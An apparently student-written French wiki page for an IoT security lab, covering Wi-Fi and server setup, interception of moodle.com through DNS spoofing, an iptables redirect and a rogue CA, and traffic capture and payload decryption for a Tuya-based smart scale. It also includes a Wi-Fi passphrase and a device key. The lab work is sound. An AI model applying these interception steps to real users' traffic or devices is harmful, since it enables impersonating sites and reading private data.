i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>trouver un mdp dans l'appli nedis /data/data/com.nedis.smartlife/shared_prefs

decouverte de tinytuya<syntaxhighlight lang="python3">
import socket
import tinytuya
import json

LOCAL_KEY = '674d29fb978a1705'

IP_BALANCE = '172.16.10.105'

print(f"[*] Démarrage du Faux Cloud Tuya...")
print(f"[*] Clé utilisée : {LOCAL_KEY}")

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(('0.0.0.0', 8886))
server_socket.listen(1)

print("[*] En attente de la balance sur le port 8886...")
print("[*] Monte sur la balance maintenant !")

while True:
try:
client, addr = server_socket.accept()
print(f"\n[+] Connexion reçue de {addr[0]} !")

data = client.recv(4096)

if data:
print(f"[i] {len(data)} octets reçus (chiffrés). Tentative de décodage...")

try:
d = tinytuya.OutletDevice('DUMMY_ID', IP_BALANCE, LOCAL_KEY)
d.set_version(3.3) # Version standard WiFi

decrypted = d._decode_payload(data)

if decrypted:
print("\n" + "="*40)
print("donnés :")
print("="*40)
parsed = json.loads(decrypted)
print(json.dumps(parsed, indent=4))

if 'dps' in parsed:
print("\nVALEURS :")
for k, v in parsed['dps'].items():
print(f"- Data Point {k} : {v}")
print("="*40)
else:
print("[-] Échec du décryptage (Format inconnu ou clé incorrecte pour ce paquet)")

except Exception as e:
print(f"[-] Erreur de décodage : {e}")

client.close()

except KeyboardInterrupt:
print("\nArrêt.")
break
except Exception as e:
print(f"Erreur serveur : {e}")
</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-02T15:33:02Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw

qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d

qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370

== Ultime tentative ==
//TO DO Ajouter méthode routage android Android studio.

= Machine <code>android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au résau SE5-SSID10.

Puis j'ai remarqué que quand je tentai de me peser, la balance affiche err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

